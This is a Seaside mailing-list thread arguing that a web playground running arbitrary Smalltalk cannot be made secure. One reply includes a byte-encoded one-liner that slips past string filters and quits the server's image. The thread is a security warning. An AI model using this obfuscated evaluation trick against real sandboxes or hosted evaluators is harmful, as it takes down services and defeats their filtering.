[Seaside] Seaside playground
stephane ducasse
stephane.ducasse at free.fr
Tue Jan 12 08:39:11 UTC 2010
Lukas
could they use your trick with using the debugger to interpret bytecode you did years ago.
Stef
On Jan 11, 2010, at 10:13 AM, Lukas Renggli wrote:
>> Thats not a simple hack.
>> And it doesn't really take over the computer.
>
> Sure. As soon as I can execute arbitrary Smalltalk code on your
> machine, i can deploy a Trojan for your platform.
>
>> Anyway, such hacks are not possible anymore.
>
> There is an infinite number of other hacks. It gets harder over time,
> but the one below is particularly simple:
>
> html evaluateUnloggedForSelf: #[34 73 110 115 116 97 108 108 32 116
> 104 101 32 102 97 118 111 114 105 116 101 32 116 114 111 121 97 110 34
> 32 83 109 97 108 108 116 97 108 107 73 109 97 103 101 32 99 117 114
> 114 101 110 116 32 115 110 97 112 115 104 111 116 58 32 102 97 108 115
> 101 32 97 110 100 81 117 105 116 58 32 116 114 117 101] asString
>
> My point is that no matter how much time you spend on making it secure
> by checking for particular patterns or strings, there will always be
> ways to fool it. In the Smalltalk world security is inherently weak,
> mostly because of the strong reflective capabilities. I would really
> love to see you application on the web, but in its current form we
> won't be able to run it on seaside.st.
>
> Lukas
>
> --
> Lukas Renggli
> http://www.lukas-renggli.ch
> _______________________________________________
> seaside mailing list
> seaside at lists.squeakfoundation.org
> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside
>
More information about the seaside
mailing list